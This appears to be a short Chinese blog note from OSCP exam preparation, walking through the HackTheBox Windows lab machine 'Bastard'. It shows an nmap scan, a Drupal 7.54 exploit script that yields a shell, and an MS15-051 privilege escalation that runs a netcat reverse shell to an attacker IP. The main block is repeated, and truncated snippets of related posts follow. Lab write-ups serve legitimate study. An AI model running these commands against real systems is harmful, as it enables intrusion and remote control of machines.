OSCP备考_0x40_HackThBox靶机_Windows_Bastard
nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.253.131 (扫描TCP)

查看到是Drupal 7.54

ruby 44449.rb http://10.129.253.131
获取到shell

开始操作提权
ms15-051x64.exe "nc.exe -nv 10.10.16.43 4445 -e cmd"



nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.253.131 (扫描TCP)

查看到是Drupal 7.54

ruby 44449.rb http://10.129.253.131
获取到shell

开始操作提权
ms15-051x64.exe "nc.exe -nv 10.10.16.43 4445 -e cmd"



nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.252.188 (扫描TCP)发现有webdav可以利用davtest -url htt...
nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.237.97 (扫描TCP)enum4linux(自动化枚举) ...
名称说明靶机下载链接https://www.vulnhub.com/entry/symfonos-2,331/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.1...
信息收集nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.143.34 (扫描TCP)nmap -sU --top-ports 100 10.129...
nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.25.107 (扫描TCP)打开8080然后就是使用EXP然后就获取到SHELL然后EA...
nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.122.40 (扫描TCP)nmap -sU --top-ports 100 ...